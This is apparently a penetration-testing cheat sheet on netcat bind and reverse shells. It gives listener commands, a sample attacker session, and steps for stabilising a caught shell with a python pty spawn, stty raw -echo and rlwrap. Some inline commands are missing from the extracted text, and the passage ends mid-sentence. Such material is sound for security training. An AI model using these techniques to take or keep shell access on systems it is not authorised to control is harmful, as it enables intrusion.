Netcat is a simple Unix utility which reads and writes data across network connections using TCP or UDP protocol. It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.
nc is the “classic” netcat, written by Hobbit. It lacks many features found in netcat-openbsd.
Netcat bind shell
To obtain a bind shell on a target where there is already a listener waiting on a chosen port of the target:
# nc <target-ip> <chosen-port>
Netcat reverse shell
netcat listener on Linux for receiving from a reverse shell of the target:
# nc -lvnp <port-number>
Stabilising netcat shells
netcat shell on Linux systems:
Spawn a better featured bash shell
Export to have access to term commands such as
Background the shell with
Ctrl+Z. Back in our own terminal, use
stty raw -echo; fgto turn off terminal echo (which gives access to tab autocompletes, the arrow keys, and
Ctrl+Cto kill processes) and foreground the shell again.
adversary@kali:~# nc -lvnp <port-number> Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::<port-number> Ncat: Listening on 0.0.0.0:<port-number> Ncat: Connection from <target IP address>. Ncat: Connection from <target IP address>:<target port-number>. python -c 'import pty;pty.spawn("/bin/bash")' shell@linux:~$ export TERM=xterm shell@linux:~$ ^Z + Stopped nc -lvnp <port-number> adversary@kali:~# stty raw -echo; fg nc -lvnp <port-number> shell@linux:~$ whoami shell
If the shell dies, any input in your own terminal will not be visible (as a result of having disabled terminal echo).
To fix this, type
reset and press enter.
For Windows shells,
rlwrap can give access to history, tab autocompletion and the arrow keys immediately when
receiving a shell, but some manual stabilisation must still be used to be able to use
Ctrl+C inside the shell.
rlwrap is not installed by default on Kali, so first install it with
sudo apt install rlwrap.
adversary@kali:~# rlwrap nc -lvnp <port-number>
The third way to stabilise a shell is to use a netcat shell as a stepping stone into a more fully-featured